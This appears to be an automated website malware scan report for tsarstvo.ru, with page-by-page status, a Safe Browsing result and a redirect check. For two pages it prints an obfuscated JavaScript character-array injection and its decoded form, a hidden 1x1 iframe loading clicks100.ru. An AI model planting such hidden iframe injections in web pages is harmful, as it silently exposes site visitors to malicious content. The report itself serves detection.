Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tsarstvo.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tsarstvo.ru/ | 200 OK Content-Length: 26237 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
a=new Array('<','i','f','r','a','m','e',' ','s','r','c','=','"','h','t','t','p',':','/','/','c','l','i','c','k','s','1','0','0','.','r','u','/','t','o','p','1','0','0','/','i','f','r','a','m','e','.','p','h','p','"',' ','w','i','d','t','h','=','1',' ','h','e','i','g','h','t','=','1',' ','s','t','y','l','e','=','"','v','i','s','i','b','i','l','i','t','y',':',' ','h','i','d','d','e','n','"','>','<','/','i','f','r','a','m','e','>');document.write(a.join(''))
Decoded script:
<iframe src="http://clicks100.ru/top100/iframe.php" width=1 height=1 style="visibility: hidden"></iframe>
Antivirus reports:
http://tsarstvo.ru/index.html | 200 OK Content-Length: 26237 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
a=new Array('<','i','f','r','a','m','e',' ','s','r','c','=','"','h','t','t','p',':','/','/','c','l','i','c','k','s','1','0','0','.','r','u','/','t','o','p','1','0','0','/','i','f','r','a','m','e','.','p','h','p','"',' ','w','i','d','t','h','=','1',' ','h','e','i','g','h','t','=','1',' ','s','t','y','l','e','=','"','v','i','s','i','b','i','l','i','t','y',':',' ','h','i','d','d','e','n','"','>','<','/','i','f','r','a','m','e','>');document.write(a.join(''))
Decoded script:
<iframe src="http://clicks100.ru/top100/iframe.php" width=1 height=1 style="visibility: hidden"></iframe>
Antivirus reports:
http://tsarstvo.ru/music/c-m-01.html | 200 OK Content-Length: 10666 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/01.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 09 Jan 2015 02:16:35 GMT Server: Apache/1.3.42 (Unix) PHP/5.2.17 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://tsarstvo.ru/links.html | 200 OK Content-Length: 7407 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-02.html | 200 OK Content-Length: 10650 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-03.html | 200 OK Content-Length: 10550 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/15.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-04.html | 200 OK Content-Length: 10878 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/04.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/02.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-05.html | 200 OK Content-Length: 11070 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/14.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-06.html | 200 OK Content-Length: 10051 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/11.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tsarstvo.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 02:16:34 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: tsarstvo.ru
Referer: http://www.google.com/search?q=tsarstvo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.